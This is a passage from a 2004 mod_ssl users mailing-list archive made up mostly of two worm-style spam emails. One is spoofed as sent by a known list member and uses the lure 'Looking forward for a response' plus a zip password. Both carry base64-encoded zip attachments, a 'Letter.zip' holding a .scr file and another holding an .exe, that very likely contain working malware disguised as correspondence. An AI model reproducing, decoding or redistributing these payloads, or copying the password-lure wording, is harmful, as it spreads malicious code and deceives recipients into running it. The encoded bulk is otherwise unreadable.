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

----------fxwfsemtnbpdplxxsfkr--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 17 04:07:17 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9659EA898B; Wed, 17 Mar 2004 04:07:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lee-sejjlvka7u1 (61-229-134-12.HINET-IP.hinet.net [61.229.134.12])
	by master.modssl.org (Postfix) with SMTP id 879A6A8941
	for ; Wed, 17 Mar 2004 04:07:10 +0100 (CET)
Date: Wed, 17 Mar 2004 11:07:19 +0800
To: modssl-users@modssl.org
Subject: Weeeeee! ;)))
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dgjaohgyngxycqslmlvt"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dgjaohgyngxycqslmlvt
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 Looking  forward for a response  :P

..btw, "47683" is a password  for archive

----------dgjaohgyngxycqslmlvt
Content-Type: application/octet-stream; name="Letter.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Letter.zip"

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
